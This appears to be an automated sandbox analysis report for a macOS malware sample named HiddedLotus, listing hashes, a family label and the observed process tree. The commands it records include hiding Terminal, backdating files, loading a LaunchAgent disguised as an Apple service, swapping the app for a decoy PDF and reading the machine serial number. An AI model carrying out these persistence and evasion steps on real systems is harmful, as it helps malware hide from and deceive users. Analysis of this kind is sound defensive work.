hiddenlotus | 7769af718266fcc91c9f39eb71d1b137156b95d6e6704d9b783988e3421ac656

General

Target

HiddedLotus.dmg
Size

548KB
MD5

54f7eadddcae17f1cb10d0cdaf426408
SHA1

bda404cb5709a1f026c47a1c0508b2b753a47836
SHA256

7769af718266fcc91c9f39eb71d1b137156b95d6e6704d9b783988e3421ac656
SHA512

a1baa3532e2237a73e8ccc353b1e1de936ec49e2a3b995ae030092873f4f5bb74d7be47eb75e85a3da254f3d21c147e2327fa67b728e70ebe09d297ccc188179

Score

10^/10

hiddenlotus miner

Malware Config

Signatures

Hiddenlotus
Hiddenlotus family.
miner hiddenlotus

/bin/sh
sh -c "sudo open /Volumes/HiddedLotus/HiddedLotus.app"
1⤵
PID:624

/bin/bash
sh -c "sudo open /Volumes/HiddedLotus/HiddedLotus.app"
1⤵
PID:624

/usr/bin/sudo
sudo open /Volumes/HiddedLotus/HiddedLotus.app
1⤵
PID:624
- /usr/bin/open
  open /Volumes/HiddedLotus/HiddedLotus.app
  2⤵
  PID:625

/Volumes/HiddedLotus/HiddedLotus.app/Contents/MacOS/Lê Thu Hà (HAEDC)
"/Volumes/HiddedLotus/HiddedLotus.app/Contents/MacOS/Lê Thu Hà (HAEDC)"
1⤵
PID:626

/bin/sh
sh -c "osascript -e 'tell application \"Finder\"' -e 'set visible of process \"Terminal\" to false' -e 'end tell' > /dev/null 2>&1"
1⤵
PID:628

/bin/bash
sh -c "osascript -e 'tell application \"Finder\"' -e 'set visible of process \"Terminal\" to false' -e 'end tell' > /dev/null 2>&1"
1⤵
PID:628
- /usr/bin/osascript
  osascript -e "tell application \"Finder\"" -e "set visible of process \"Terminal\" to false" -e "end tell"
  2⤵
  PID:629

/bin/sh
sh -c "touch -t 1408241930 \"/Users/run/Library/Containers/com.apple.lateragent/Data/Library/Preferences/hidd\" >/dev/null 2>&1"
1⤵
PID:630

/bin/bash
sh -c "touch -t 1408241930 \"/Users/run/Library/Containers/com.apple.lateragent/Data/Library/Preferences/hidd\" >/dev/null 2>&1"
1⤵
PID:630
- /usr/bin/touch
  touch -t 1408241930 /Users/run/Library/Containers/com.apple.lateragent/Data/Library/Preferences/hidd
  2⤵
  PID:631

/bin/sh
sh -c "touch -t 1408241930 \"/Users/run/Library/LaunchAgents/com.apple.hidd.shared.plist\" >/dev/null 2>&1"
1⤵
PID:632

/bin/bash
sh -c "touch -t 1408241930 \"/Users/run/Library/LaunchAgents/com.apple.hidd.shared.plist\" >/dev/null 2>&1"
1⤵
PID:632
- /usr/bin/touch
  touch -t 1408241930 /Users/run/Library/LaunchAgents/com.apple.hidd.shared.plist
  2⤵
  PID:633

/bin/sh
sh -c "launchctl load ~/Library/LaunchAgents/com.apple.hidd.shared.plist > /dev/null 2>&1 &"
1⤵
PID:634

/bin/sh
sh -c "mv -f \"/Volumes/HiddedLotus/HiddedLotus.app/Contents/Resources/configureDefault.sys\" \"/tmp/HiddedLotus.pdf\" > /dev/null 2>&1 ; open \"/tmp/HiddedLotus.pdf\" & > /dev/null 2>&1 ; rm -rf \"/Volumes/HiddedLotus/HiddedLotus.app\" > /dev/null 2>&1 ; cp -f \"/tmp/HiddedLotus.pdf\" \"/Volumes/HiddedLotus/HiddedLotus.pdf\" > /dev/null 2>&1 ; sleep 3 ; rm -rf \"/tmp/HiddedLotus.pdf\" > /dev/null 2>&1"
1⤵
PID:635

/bin/bash
sh -c "launchctl load ~/Library/LaunchAgents/com.apple.hidd.shared.plist > /dev/null 2>&1 &"
1⤵
PID:634
- /bin/launchctl
  launchctl load /Users/run/Library/LaunchAgents/com.apple.hidd.shared.plist
  2⤵
  PID:636

/bin/bash
sh -c "mv -f \"/Volumes/HiddedLotus/HiddedLotus.app/Contents/Resources/configureDefault.sys\" \"/tmp/HiddedLotus.pdf\" > /dev/null 2>&1 ; open \"/tmp/HiddedLotus.pdf\" & > /dev/null 2>&1 ; rm -rf \"/Volumes/HiddedLotus/HiddedLotus.app\" > /dev/null 2>&1 ; cp -f \"/tmp/HiddedLotus.pdf\" \"/Volumes/HiddedLotus/HiddedLotus.pdf\" > /dev/null 2>&1 ; sleep 3 ; rm -rf \"/tmp/HiddedLotus.pdf\" > /dev/null 2>&1"
1⤵
PID:635
- /bin/mv
  mv -f /Volumes/HiddedLotus/HiddedLotus.app/Contents/Resources/configureDefault.sys /tmp/HiddedLotus.pdf
  2⤵
  PID:637
- /usr/bin/open
  open /tmp/HiddedLotus.pdf
  2⤵
  PID:648
- /bin/rm
  rm -rf /Volumes/HiddedLotus/HiddedLotus.app
  2⤵
  PID:649
- /bin/cp
  cp -f /tmp/HiddedLotus.pdf /Volumes/HiddedLotus/HiddedLotus.pdf
  2⤵
  PID:650
- /bin/sleep
  sleep 3
  2⤵
  PID:652
- /bin/rm
  rm -rf /tmp/HiddedLotus.pdf
  2⤵
  PID:655

/usr/libexec/xpcproxy
xpcproxy com.apple.hidd.shared
1⤵
PID:638

/Users/run/Library/Containers/com.apple.lateragent/Data/Library/Preferences/hidd
/Users/run/Library/Containers/com.apple.lateragent/Data/Library/Preferences/hidd
1⤵
PID:638

/bin/sh
sh -c "ioreg -rd1 -c IOPlatformExpertDevice | awk '/IOPlatformSerialNumber/ { split(\$0, line, \"\\\"\"); printf(\"%s\", line[4]); }' 2>&1"
1⤵
PID:639

/bin/bash
sh -c "ioreg -rd1 -c IOPlatformExpertDevice | awk '/IOPlatformSerialNumber/ { split(\$0, line, \"\\\"\"); printf(\"%s\", line[4]); }' 2>&1"
1⤵
PID:639
- /usr/sbin/ioreg
  ioreg -rd1 -c IOPlatformExpertDevice
  2⤵
  PID:640
- /usr/bin/awk
  awk "/IOPlatformSerialNumber/ { split(\$0, line, \"\\\"\"); printf(\"%s\", line[4]); }"
  2⤵
  PID:641

/bin/sh
sh -c "touch -t 1302181440 \"/Users/run/Library/Calendars/Calendar Sync Changes/Calendar Sync\" >/dev/null 2>&1"
1⤵
PID:642

/bin/bash
sh -c "touch -t 1302181440 \"/Users/run/Library/Calendars/Calendar Sync Changes/Calendar Sync\" >/dev/null 2>&1"
1⤵
PID:642
- /usr/bin/touch
  touch -t 1302181440 "/Users/run/Library/Calendars/Calendar Sync Changes/Calendar Sync"
  2⤵
  PID:643

/bin/sh
sh -c "sw_vers -productVersion 2>&1"
1⤵
PID:644

/bin/bash
sh -c "sw_vers -productVersion 2>&1"
1⤵
PID:644
- /usr/bin/sw_vers
  sw_vers -productVersion
  2⤵
  PID:645

/bin/sh
sh -c "uname -m 2>&1"
1⤵
PID:646

/bin/bash
sh -c "uname -m 2>&1"
1⤵
PID:646
- /usr/bin/uname
  uname -m
  2⤵
  PID:647

/bin/sh
sh -c "sw_vers -productVersion 2>&1"
1⤵
PID:656

/bin/bash
sh -c "sw_vers -productVersion 2>&1"
1⤵
PID:656
- /usr/bin/sw_vers
  sw_vers -productVersion
  2⤵
  PID:657

/bin/sh
sh -c "uname -m 2>&1"
1⤵
PID:658

/bin/bash
sh -c "uname -m 2>&1"
1⤵
PID:658
- /usr/bin/uname
  uname -m
  2⤵
  PID:659

/bin/sh
sh -c "sw_vers -productVersion 2>&1"
1⤵
PID:662

/bin/bash
sh -c "sw_vers -productVersion 2>&1"
1⤵
PID:662
- /usr/bin/sw_vers
  sw_vers -productVersion
  2⤵
  PID:663

/bin/sh
sh -c "uname -m 2>&1"
1⤵
PID:664

/bin/bash
sh -c "uname -m 2>&1"
1⤵
PID:664
- /usr/bin/uname
  uname -m
  2⤵
  PID:665

/bin/sh
sh -c "sw_vers -productVersion 2>&1"
1⤵
PID:666

/bin/bash
sh -c "sw_vers -productVersion 2>&1"
1⤵
PID:666
- /usr/bin/sw_vers
  sw_vers -productVersion
  2⤵
  PID:667

/bin/sh
sh -c "uname -m 2>&1"
1⤵
PID:668

/bin/bash
sh -c "uname -m 2>&1"
1⤵
PID:668
- /usr/bin/uname
  uname -m
  2⤵
  PID:669

/bin/sh
sh -c "sw_vers -productVersion 2>&1"
1⤵
PID:670

/bin/bash
sh -c "sw_vers -productVersion 2>&1"
1⤵
PID:670
- /usr/bin/sw_vers
  sw_vers -productVersion
  2⤵
  PID:671

/bin/sh
sh -c "uname -m 2>&1"
1⤵
PID:672

/bin/bash
sh -c "uname -m 2>&1"
1⤵
PID:672
- /usr/bin/uname
  uname -m
  2⤵
  PID:673

/bin/sh
sh -c "sw_vers -productVersion 2>&1"
1⤵
PID:674

/bin/bash
sh -c "sw_vers -productVersion 2>&1"
1⤵
PID:674
- /usr/bin/sw_vers
  sw_vers -productVersion
  2⤵
  PID:675

/bin/sh
sh -c "uname -m 2>&1"
1⤵
PID:676

/bin/bash
sh -c "uname -m 2>&1"
1⤵
PID:676
- /usr/bin/uname
  uname -m
  2⤵
  PID:677

Resubmissions

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads